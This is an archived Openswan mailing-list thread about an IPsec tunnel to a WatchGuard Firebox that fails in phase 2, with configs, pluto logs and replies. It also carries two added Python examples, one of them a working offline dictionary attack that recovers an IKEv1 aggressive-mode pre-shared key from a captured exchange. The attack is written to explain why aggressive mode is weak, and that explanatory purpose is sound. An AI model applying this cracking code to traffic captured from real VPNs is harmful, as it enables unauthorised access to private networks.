<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312">
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns="http://www.w3.org/TR/REC-html40">
<head>
<title>perhaps peer likes no proposal</title>
</head>
<body lang=ZH-CN link=blue vlink=purple>
<div class=Section1>
<p class=MsoNormal><font size=2 color=blue face=微软雅黑><span
lang=EN-US style='font-size:10.0pt;font-family:\5FAE\8F6F\96C5\9ED1;color:blue'>I
think phase 1 has been established successfully, so it does not result
from the aggressive mode.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=blue face=微软雅黑><span
lang=EN-US style='font-size:10.0pt;font-family:\5FAE\8F6F\96C5\9ED1;color:blue'>Could
you disable PFS (pfs=no) and have a try?<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=blue face=微软雅黑><span
lang=EN-US style='font-size:10.0pt;font-family:\5FAE\8F6F\96C5\9ED1;color:blue'><o:p> </o:p></span></font></p>
<div>
<p class=MsoNormal><font size=2 color=blue face="Times New Roman"><span
lang=EN-US style='font-size:10.0pt;color:blue'>Thanks! </span></font><font
color=blue><span lang=EN-US style='color:blue'><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=blue face="Times New Roman"><span
lang=EN-US style='font-size:10.0pt;color:blue'>Aaron (Bo) Zhang</span></font><span
lang=EN-US><o:p></o:p></span></p>
</div>
<div>
<div class=MsoNormal align=center style='text-align:center'><font size=3
face="Times New Roman"><span lang=EN-US style='font-size:12.0pt'>
<hr size=2 width="100%" align=center tabindex=-1>
</span></font></div>
<p class=MsoNormal><b><font size=2 face=Tahoma><span lang=EN-US
style='font-size:10.0pt;font-family:Tahoma;font-weight:bold'>From:</span></font></b><font
size=2 face=Tahoma><span lang=EN-US style='font-size:10.0pt;font-family:Tahoma'>
users-bounces@openswan.org [mailto:users-bounces@openswan.org] <b><span
style='font-weight:bold'>On Behalf Of </span></b>simon charles<br>
<b><span style='font-weight:bold'>Sent:</span></b> 26 November 2008 3:28<br>
<b><span style='font-weight:bold'>To:</span></b> tudor.georgescu@aardman.com;
users@openswan.org<br>
<b><span style='font-weight:bold'>Subject:</span></b> Re: [Openswan Users]
perhaps peer likes no proposal</span></font><span lang=EN-US><o:p></o:p></span></p>
</div>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-US
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='margin-bottom:12.0pt'><font size=2 face=Verdana><span
lang=EN-US style='font-size:10.0pt;font-family:Verdana'>Hi!<br>
From the logs, openswan is trying to connect using
'aggressive mode'. Is the WatchGuard expecting to connect using aggressive mode?
Aggressive mode is less secure than main mode; unless you are using a
roadwarrior configuration, I would recommend that you use main mode.<br>
Thanks!<o:p></o:p></span></font></p>
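<p class=MsoNormal>Simon's point that aggressive mode is weaker than main mode rests on one detail of RFC 2409: with pre-shared-key authentication the responder's HASH_R, and every value it is computed over (both nonces, both DH public values, both cookies, the initiator's SA payload and the responder's ID payload), travel unencrypted in the first two aggressive-mode messages, so anyone who can sniff them can test PSK guesses offline. This is the same calculation tools such as ike-scan's psk-crack perform. The Python below is an added example written for this page, not Openswan code and not from anyone in the thread. The "captured" exchange is constructed (random bytes stand in for the DH and SA payload bodies, the PSK and wordlist are made up, and 203.0.113.1 is an invented responder address); the hash construction follows RFC 2409 section 5 with HMAC-SHA1 as the prf, matching the prf=oakley_sha in the posted log. In main mode the same hashes are sent under the encryption derived from the DH exchange, so a passive eavesdropper cannot run this check.</p>

```python
"""Why IKEv1 aggressive mode with a pre-shared key is weak: HASH_R is sent in the clear."""
import hashlib
import hmac
import os
from dataclasses import dataclass, replace
from typing import Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """The negotiated prf=oakley_sha is HMAC-SHA1 (RFC 2409 section 4)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    """Pre-shared-key authentication: SKEYID = prf(PSK, Ni_b | Nr_b) (RFC 2409 section 5.4)."""
    return prf(psk, ni + nr)


@dataclass(frozen=True)
class Capture:
    """Everything a passive observer sees in the first two aggressive-mode messages."""
    cky_i: bytes    # initiator cookie from the ISAKMP header (8 bytes)
    cky_r: bytes    # responder cookie (8 bytes)
    sai_b: bytes    # body of the initiator's SA payload
    g_xi: bytes     # initiator's DH public value (KE payload body)
    g_xr: bytes     # responder's DH public value
    ni: bytes       # initiator nonce
    nr: bytes       # responder nonce
    idir_b: bytes   # body of the responder's ID payload
    hash_r: bytes   # responder's HASH_R, unencrypted in aggressive mode


def hash_r(psk: bytes, c: Capture) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b) (RFC 2409 section 5)."""
    return prf(skeyid_psk(psk, c.ni, c.nr),
               c.g_xr + c.g_xi + c.cky_r + c.cky_i + c.sai_b + c.idir_b)


def simulate_capture(psk: bytes) -> Capture:
    """Constructed stand-in for a sniffed exchange. Random bytes replace a real group 2
    DH exchange and SA payload; only the HASH_R computation is the real one."""
    c = Capture(
        cky_i=os.urandom(8), cky_r=os.urandom(8), sai_b=os.urandom(56),
        g_xi=os.urandom(128), g_xr=os.urandom(128),      # modp1024 public values are 128 bytes
        ni=os.urandom(16), nr=os.urandom(16),
        # ID_IPV4_ADDR (type 1), protocol/port zero, address 203.0.113.1 (made-up responder IP)
        idir_b=bytes([1, 0, 0, 0]) + bytes([203, 0, 113, 1]),
        hash_r=b"",
    )
    return replace(c, hash_r=hash_r(psk, c))   # what the responder puts on the wire


def crack_psk(c: Capture, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R per guess and compare with the captured one.
    Nothing is sent to either peer, so neither side can notice or rate-limit it."""
    for guess in candidates:
        if hmac.compare_digest(hash_r(guess, c), c.hash_r):
            return guess
    return None


if __name__ == "__main__":
    cap = simulate_capture(b"correcthorse")           # the peers' shared secret (constructed)
    wordlist = [b"password", b"letmein", b"correcthorse", b"watchguard"]
    print("recovered PSK:", crack_psk(cap, wordlist))
```

<p class=MsoNormal>The attack costs one HMAC-SHA1 per guess and needs no traffic to either gateway, which is why a PSK used with aggressive mode has to be long and random rather than a word, and why main mode (or certificate authentication) is the better default when the peer's address is fixed, as it is for a site-to-site tunnel to a Firebox.</p>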
<div class=MsoNormal align=center style='text-align:center'><font size=2
face=Verdana><span lang=EN-US style='font-size:10.0pt;font-family:Verdana'>
<hr size=2 width="100%" align=center id=stopSpelling>
</span></font></div>
<p class=MsoNormal><font size=2 face=Verdana><span lang=EN-US style='font-size:
10.0pt;font-family:Verdana'>Date: Tue, 25 Nov 2008 17:33:16 +0000<br>
From: Tudor.Georgescu@aardman.com<br>
To: users@openswan.org<br>
Subject: [Openswan Users] perhaps peer likes no proposal<br>
<br>
Hey guys,<br>
I have been struggling with this for a few days now. I've become thoroughly
stuck on what I believe may be phase 2.<br>
<br>
I am trying to connect openswan-2.6.19 [left] (and openswan-2.6.19 up to the .19
release) to a WatchGuard Firebox [right].<br>
<br>
Many releases ago, this was once possible: http://wiki.openswan.org/index.php/Interop/InteroperatingWatchguard<br>
<br>
Unfortunately, following many tutorials and the Paul and Ken book has still left
me in the dark.<br>
<br>
I have been on the #openswan IRC channel and they suggested that "perhaps
peer likes no proposal" means I'm not matching IKE or ESP properly. I've
checked, double checked, and thrice checked both ends, but I'm still getting
stuck.<br>
<br>
Settings-wise, what is still a mystery to me is the tunnel settings. On the
WatchGuard end, it's configured to give me the virtual IP of a.b.c.d, which puts
me on the network w.x.y.z/24. I've tried various rightnexthop/rightsubnet
settings, but that does not appear to make any changes to the connection. Am I
barking up the wrong tree? Does the tunnel have anything to do with
"perhaps peer likes no proposal"?<br>
<br>
Any explanations of what the following means would also be much appreciated.
I.e. what is STATE_AGGR_I2 trying to achieve?<br>
localhost pluto[27033]: "myvpn" #1: retransmitting in response to
duplicate packet; already STATE_AGGR_I2<br>
localhost pluto[27033]: "myvpn" #1: discarding duplicate packet --
exhausted retransmission; already STATE_AGGR_I2<br>
<br>
Thank you in advance guys and gals.<br>
<br>
Tudor<br>
<br>
# /etc/ipsec.conf - Openswan IPsec configuration file<br>
version 2.0 # conforms to second version of ipsec.conf specification<br>
<br>
config setup<br>
&nbsp;&nbsp;&nbsp;&nbsp;interfaces=%defaultroute<br>
&nbsp;&nbsp;&nbsp;&nbsp;nat_traversal=yes<br>
&nbsp;&nbsp;&nbsp;&nbsp;OE=off<br>
&nbsp;&nbsp;&nbsp;&nbsp;protostack=netkey<br>
&nbsp;&nbsp;&nbsp;&nbsp;uniqueids=yes<br>
<br>
conn myvpn<br>
&nbsp;&nbsp;&nbsp;&nbsp;pfs=yes<br>
&nbsp;&nbsp;&nbsp;&nbsp;authby=secret<br>
&nbsp;&nbsp;&nbsp;&nbsp;type=tunnel<br>
&nbsp;&nbsp;&nbsp;&nbsp;aggrmode=yes<br>
&nbsp;&nbsp;&nbsp;&nbsp;keyexchange=ike<br>
&nbsp;&nbsp;&nbsp;&nbsp;auth=esp<br>
&nbsp;&nbsp;&nbsp;&nbsp;ike=aes256-sha1-modp1024<br>
&nbsp;&nbsp;&nbsp;&nbsp;esp=aes256-sha1;modp1024<br>
&nbsp;&nbsp;&nbsp;&nbsp;left=10.0.0.128<br>
&nbsp;&nbsp;&nbsp;&nbsp;leftsubnet=10.0.0.0/24<br>
&nbsp;&nbsp;&nbsp;&nbsp;leftnexthop=10.0.0.138<br>
&nbsp;&nbsp;&nbsp;&nbsp;leftid=my@id.com<br>
&nbsp;&nbsp;&nbsp;&nbsp;right=&lt;vpn.public.ip&gt;<br>
&nbsp;&nbsp;&nbsp;&nbsp;#rightnexthop=a.b.c.d<br>
&nbsp;&nbsp;&nbsp;&nbsp;rightsubnet=w.x.y.z/24<br>
&nbsp;&nbsp;&nbsp;&nbsp;rightid=&lt;vpn.public.ip&gt;<br>
&nbsp;&nbsp;&nbsp;&nbsp;auto=start<br>
<br>
The output was from rel 2.6.18, but I get the same from 2.6.19.<br>
<br>
/var/log/messages<br>
<br>
localhost pluto[26477]: shutting down<br>
localhost pluto[26477]: forgetting secrets<br>
localhost pluto[26477]: "myvpn": deleting connection<br>
localhost pluto[26477]: "myvpn" #1: deleting state (STATE_AGGR_I2)<br>
localhost pluto[26477]: "myvpn": request to delete a unrouted policy
with netkey kernel --- experimental<br>
localhost pluto[26477]: shutting down interface lo/lo ::1:500<br>
localhost pluto[26477]: shutting down interface lo/lo 127.0.0.1:4500<br>
localhost pluto[26477]: shutting down interface lo/lo 127.0.0.1:500<br>
localhost pluto[26477]: shutting down interface eth0/eth0 10.0.0.128:4500<br>
localhost pluto[26477]: shutting down interface eth0/eth0 10.0.0.128:500<br>
localhost ipsec__plutorun: Starting Pluto subsystem...<br>
localhost pluto[27033]: Starting Pluto (Openswan Version 2.6.18; Vendor ID
OE}ZvZ@M[OWD) pid:27033<br>
localhost pluto[27033]: Setting NAT-Traversal port-4500 floating to on<br>
localhost pluto[27033]: port floating activation criteria
nat_t=1/port_float=1<br>
localhost pluto[27033]: including NAT-Traversal patch
(Version 0.6c)<br>
localhost pluto[27033]: using /dev/urandom as source of random entropy<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating
OAKLEY_TWOFISH_CBC_SSH: Ok (ret=0)<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating OAKLEY_TWOFISH_CBC:
Ok (ret=0)<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating OAKLEY_SERPENT_CBC:
Ok (ret=0)<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating OAKLEY_AES_CBC: Ok
(ret=0)<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating OAKLEY_BLOWFISH_CBC:
Ok (ret=0)<br>
localhost pluto[27033]: ike_alg_register_hash(): Activating OAKLEY_SHA2_512: Ok
(ret=0)<br>
localhost pluto[27033]: ike_alg_register_hash(): Activating OAKLEY_SHA2_256: Ok
(ret=0)<br>
localhost pluto[27033]: starting up 1 cryptographic helpers<br>
localhost pluto[27034]: using /dev/urandom as source of random entropy<br>
localhost pluto[27033]: started helper pid=27034 (fd:7)<br>
localhost pluto[27033]: Using Linux 2.6 IPsec interface code on 2.6.26.5-28.fc8
(experimental code)<br>
localhost pluto[27033]: ike_alg_register_enc(): WARNING: enc alg=0 not found in
constants.c:oakley_enc_names<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating &lt;NULL&gt;: Ok
(ret=0)<br>
localhost pluto[27033]: ike_alg_register_enc(): WARNING: enc alg=0 not found in
constants.c:oakley_enc_names<br>
localhost pluto[27033]: ike_alg_add(): ERROR: Algorithm already exists<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating &lt;NULL&gt;: FAILED
(ret=-17)<br>
localhost pluto[27033]: ike_alg_register_enc(): WARNING: enc alg=0 not found in
constants.c:oakley_enc_names<br>
localhost pluto[27033]: ike_alg_add(): ERROR: Algorithm already exists<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating &lt;NULL&gt;: FAILED
(ret=-17)<br>
localhost pluto[27033]: ike_alg_register_enc(): WARNING: enc alg=0 not found in
constants.c:oakley_enc_names<br>
localhost pluto[27033]: ike_alg_add(): ERROR: Algorithm already exists<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating &lt;NULL&gt;: FAILED
(ret=-17)<br>
localhost pluto[27033]: ike_alg_register_enc(): WARNING: enc alg=0 not found in
constants.c:oakley_enc_names<br>
localhost pluto[27033]: ike_alg_add(): ERROR: Algorithm already exists<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating &lt;NULL&gt;: FAILED
(ret=-17)<br>
localhost pluto[27033]: ike_alg_register_enc(): WARNING: enc alg=0 not found in
constants.c:oakley_enc_names<br>
localhost pluto[27033]: ike_alg_add(): ERROR: Algorithm already exists<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating &lt;NULL&gt;: FAILED
(ret=-17)<br>
localhost pluto[27033]: Changed path to directory '/etc/ipsec.d/cacerts'<br>
localhost pluto[27033]: Changed path to directory '/etc/ipsec.d/aacerts'<br>
localhost pluto[27033]: Changed path to directory '/etc/ipsec.d/ocspcerts'<br>
localhost pluto[27033]: Changing to directory '/etc/ipsec.d/crls'<br>
localhost pluto[27033]: Warning: empty directory<br>
localhost pluto[27033]: Changing back to directory '/tmp' failed - (2 No such
file or directory)<br>
localhost pluto[27033]: Changing back to directory '/tmp' failed - (2 No such
file or directory)<br>
localhost pluto[27033]: added connection description "myvpn"<br>
localhost pluto[27033]: listening for IKE messages<br>
localhost pluto[27033]: adding interface eth0/eth0 10.0.0.128:500<br>
localhost pluto[27033]: adding interface eth0/eth0 10.0.0.128:4500<br>
localhost pluto[27033]: adding interface lo/lo 127.0.0.1:500<br>
localhost pluto[27033]: adding interface lo/lo 127.0.0.1:4500<br>
localhost pluto[27033]: adding interface lo/lo ::1:500<br>
localhost pluto[27033]: loading secrets from "/etc/ipsec.secrets"<br>
localhost pluto[27033]: "myvpn": request to add a prospective erouted
policy with netkey kernel --- experimental<br>
localhost pluto[27033]: "myvpn" #1: initiating Aggressive Mode #1,
connection "myvpn"<br>
localhost pluto[27033]: | setting sec: 1<br>
localhost pluto[27033]: "myvpn" #1: received Vendor ID payload [Dead
Peer Detection]<br>
localhost pluto[27033]: "myvpn" #1: received Vendor ID payload
[draft-ietf-ipsec-nat-t-ike-02_n] method set to=106<br>
localhost pluto[27033]: "myvpn" #1: Aggressive mode peer ID is
ID_IPV4_ADDR: '&lt;vpn.public.ip&gt;'<br>
localhost pluto[27033]: "myvpn" #1: NAT-Traversal: Result using
draft-ietf-ipsec-nat-t-ike-02/03: i am NATed<br>
localhost pluto[27033]: "myvpn" #1: Aggressive mode peer ID is
ID_IPV4_ADDR: '&lt;vpn.public.ip&gt;'<br>
localhost pluto[27033]: "myvpn" #1: transition from state
STATE_AGGR_I1 to state STATE_AGGR_I2<br>
localhost pluto[27033]: "myvpn" #1: STATE_AGGR_I2: sent AI2, ISAKMP
SA established {auth=OAKLEY_PRESHARED_KEY cipher=aes_256 prf=oakley_sha
group=modp1024}<br>
localhost pluto[27033]: "myvpn" #2: initiating Quick Mode
PSK+ENCRYPT+TUNNEL+PFS+UP+AGGRESSIVE+IKEv2ALLOW {using isakmp#1 msgid:131f6317
proposal=AES(12)_256-SHA1(2)_160 pfsgroup=OAKLEY_GROUP_MODP1024}<br>
localhost pluto[27033]: "myvpn" #1: retransmitting in response to
duplicate packet; already STATE_AGGR_I2<br>
localhost pluto[27033]: "myvpn" #1: retransmitting in response to
duplicate packet; already STATE_AGGR_I2<br>
localhost pluto[27033]: "myvpn" #1: discarding duplicate packet --
exhausted retransmission; already STATE_AGGR_I2<br>
localhost pluto[27033]: "myvpn" #2: max number of retransmissions (2)
reached STATE_QUICK_I1. No acceptable response to our first Quick Mode
message: perhaps peer likes no proposal<br>
localhost pluto[27033]: "myvpn" #2: starting keying attempt 2 of at
most 3<br>
Nov 21 18:02:42 localhost pluto[27033]: "myvpn" #3: initiating Quick
Mode PSK+ENCRYPT+TUNNEL+PFS+UP+AGGRESSIVE+IKEv2ALLOW to replace #2 {using
isakmp#1 msgid:bd4d55d2 proposal=AES(12)_256-SHA1(2)_160
pfsgroup=OAKLEY_GROUP_MODP1024}<br>
localhost pluto[27033]: "myvpn" #3: max number of retransmissions (2)
reached STATE_QUICK_I1. No acceptable response to our first Quick Mode
message: perhaps peer likes no proposal<br>
localhost pluto[27033]: "myvpn" #3: starting keying attempt 3 of at
most 3<br>
localhost pluto[27033]: "myvpn" #4: initiating Quick Mode
PSK+ENCRYPT+TUNNEL+PFS+UP+AGGRESSIVE+IKEv2ALLOW to replace #3 {using isakmp#1
msgid:947f04f5 proposal=AES(12)_256-SHA1(2)_160 pfsgroup=OAKLEY_GROUP_MODP1024}<br>
localhost pluto[27033]: "myvpn" #4: max number of retransmissions (2)
reached STATE_QUICK_I1. No acceptable response to our first Quick Mode
message: perhaps peer likes no proposal<br>
<br>
- --------------------------------------------------------------------<br>
http://www.aardman.com<br>
<o:p></o:p></span></font></p>
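<p class=MsoNormal>An added example, not from the thread and not Openswan code: the Python below reads pluto lines of the shape Tudor posted (a trimmed, constructed copy is embedded, so nothing is read from a live log) and separates the two outcomes the log mixes together. STATE_AGGR_I2 is simply the initiator's state after it has sent its second and last aggressive-mode message; pluto declares the ISAKMP SA established at that point and moves straight on to Quick Mode, and "perhaps peer likes no proposal" is Quick Mode timing out with no acceptable answer. The triage pulls out the phase 1 parameters, the phase 2 ESP proposal and the PFS group the responder declined, and counts the duplicate phase 1 packets the peer kept sending after our side considered phase 1 finished. The regexes, the Diagnosis fields and the findings text are mine; the log format is the one visible in the posted output.</p>

```python
"""Triage of Openswan pluto log lines: separate the IKEv1 phase 1 outcome from phase 2."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: a trimmed copy of the kind of lines pluto writes to /var/log/messages.
SAMPLE_LOG = """\
localhost pluto[27033]: "myvpn" #1: initiating Aggressive Mode #1, connection "myvpn"
localhost pluto[27033]: "myvpn" #1: transition from state STATE_AGGR_I1 to state STATE_AGGR_I2
localhost pluto[27033]: "myvpn" #1: STATE_AGGR_I2: sent AI2, ISAKMP SA established {auth=OAKLEY_PRESHARED_KEY cipher=aes_256 prf=oakley_sha group=modp1024}
localhost pluto[27033]: "myvpn" #2: initiating Quick Mode PSK+ENCRYPT+TUNNEL+PFS+UP+AGGRESSIVE+IKEv2ALLOW {using isakmp#1 msgid:131f6317 proposal=AES(12)_256-SHA1(2)_160 pfsgroup=OAKLEY_GROUP_MODP1024}
localhost pluto[27033]: "myvpn" #1: retransmitting in response to duplicate packet; already STATE_AGGR_I2
localhost pluto[27033]: "myvpn" #1: discarding duplicate packet -- exhausted retransmission; already STATE_AGGR_I2
localhost pluto[27033]: "myvpn" #2: max number of retransmissions (2) reached STATE_QUICK_I1. No acceptable response to our first Quick Mode message: perhaps peer likes no proposal
"""

# pluto prefixes every per-state line with the connection name and a state number (#1, #2, ...).
LINE_RE = re.compile(r'pluto\[\d+\]: "(?P<conn>[^"]+)" #(?P<sa>\d+): (?P<msg>.*)$')
BRACES_RE = re.compile(r"\{(?P<body>[^}]*)\}")


@dataclass
class Diagnosis:
    conn: Optional[str] = None
    phase1_mode: Optional[str] = None              # "Aggressive" or "Main"
    phase1_established: bool = False               # our side declared the ISAKMP SA up
    phase1_params: Dict[str, str] = field(default_factory=dict)
    phase2_attempts: int = 0
    phase2_flags: List[str] = field(default_factory=list)
    phase2_proposal: Optional[str] = None
    phase2_pfsgroup: Optional[str] = None
    phase2_no_proposal: bool = False
    peer_retransmits_after_phase1: int = 0         # duplicate phase 1 packets seen later


def _kv(body: str) -> Dict[str, str]:
    """Turn 'auth=X cipher=Y ...' inside pluto's braces into a dict."""
    return dict(tok.split("=", 1) for tok in body.split() if "=" in tok)


def triage(log: str) -> Diagnosis:
    d = Diagnosis()
    for line in log.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        d.conn = d.conn or m["conn"]
        msg = m["msg"]
        mode = re.match(r"initiating (Aggressive|Main) Mode", msg)
        if mode:
            d.phase1_mode = mode.group(1)
        elif "ISAKMP SA established" in msg:
            d.phase1_established = True
            b = BRACES_RE.search(msg)
            if b:
                d.phase1_params = _kv(b["body"])
        elif msg.startswith("initiating Quick Mode"):
            d.phase2_attempts += 1
            d.phase2_flags = msg.split()[3].split("+")   # e.g. PSK+ENCRYPT+TUNNEL+PFS+...
            b = BRACES_RE.search(msg)
            if b:
                kv = _kv(b["body"])
                d.phase2_proposal = kv.get("proposal")
                d.phase2_pfsgroup = kv.get("pfsgroup")
        elif "perhaps peer likes no proposal" in msg:
            d.phase2_no_proposal = True
        elif "duplicate packet" in msg and d.phase1_established:
            d.peer_retransmits_after_phase1 += 1
    return d


def findings(d: Diagnosis) -> List[str]:
    out = []
    if d.phase1_mode:
        out.append(f"phase 1 ran in {d.phase1_mode} Mode")
    if d.phase1_established:
        p = d.phase1_params
        out.append(f"phase 1 (ISAKMP SA) established from our side: "
                   f"{p.get('cipher')}/{p.get('prf')}/{p.get('group')}, auth {p.get('auth')}")
    if d.phase2_no_proposal:
        pfs = "PFS" in d.phase2_flags
        out.append(f"phase 2 (Quick Mode) got no acceptable response in {d.phase2_attempts} attempt(s): "
                   f"ESP proposal {d.phase2_proposal}"
                   + (f" with PFS group {d.phase2_pfsgroup}" if pfs else " without PFS"))
        out.append("compare the peer's phase 2 settings: ESP cipher and integrity, PFS on/off and group, "
                   "and the traffic selectors (leftsubnet/rightsubnet)")
    if d.peer_retransmits_after_phase1:
        out.append(f"peer re-sent its last phase 1 message {d.peer_retransmits_after_phase1} time(s) after we "
                   "declared the ISAKMP SA up; our final aggressive-mode message gets no acknowledgement, so "
                   "this is consistent with the responder not having accepted it (PSK/ID mismatch, or it not arriving)")
    return out


if __name__ == "__main__":
    for line in findings(triage(SAMPLE_LOG)):
        print("-", line)
```

<p class=MsoNormal>Run it as a script for the summary, or pass the real /var/log/messages text to triage(). Two caveats the summary makes visible: the initiator's last aggressive-mode message carries HASH_I and is never acknowledged, so a responder that keeps re-sending its own phase 1 message has not accepted it (wrong PSK, an ID that does not match what it expects, or the packet not arriving after the NAT-T float to port 4500), and "ISAKMP SA established" on the initiator is therefore not proof that the peer agrees. And Quick Mode with PFS on carries a KE payload for the listed group; a responder configured without PFS, or with another group, commonly stays silent rather than answering, which is the mismatch that trying pfs=no tests for.</p>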
</div>
</body>
</html>